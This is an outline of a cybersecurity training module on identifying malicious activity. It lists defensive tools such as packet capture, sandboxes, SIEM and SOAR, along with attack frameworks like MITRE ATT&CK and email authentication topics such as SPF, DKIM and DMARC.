Apply Tools to Identify Malicious Activity

---

Goals

• Explore techniques used to identify malicious activity
• Learn about command line tools used for domain analysis
• Explore attack frameworks
• Explore methods used in email analysis
• Learn about frequently abused command line tools

Identify Malicious Activity

• Packet Capture Tools
  • Wireshark
  • tcpdump
• Endpoint Detection and Response (EDR)
• Common Analysis Tools
  • Whois
  • AbuseIPDB
  • Strings Command
  • VirusTotal
• Sandboxing for Malware Analysis
  • Sandbox
    • Sandboxing in Security Operations
    • Sandbox for Malware Analysis
  • Joe Sandbox
  • Cuckoo Sandbox
  • CrowdStrike’s Hybrid Analysis
• Security Information and Event Management (SIEM)
  • SIEM Capabilities
• Security Orchestration, Automation, and Response (SOAR)
  • SOAR Runbook

Attack Methodology Frameworks

• Cyber Kill Chain
• MITRE ATT&CK Framework
• Diamond Model of Intrusion Analysis
• Open Source Security Testing Methodology Manual (OSSTMM)

Techniques for Identifying Malicious Activity

• Email Message Internet Header Analysis
• Email Malicious Content Analysis
• Email Security
  • Sender Policy Framework (SPF)
  • DomainKeys Identified Mail (DKIM)
  • Domain-Based Message Authentication, Reporting, and Conformance (DMARC)
  • Cousin Domains
• Interpreting Suspicious Commands
• Abnormal Activity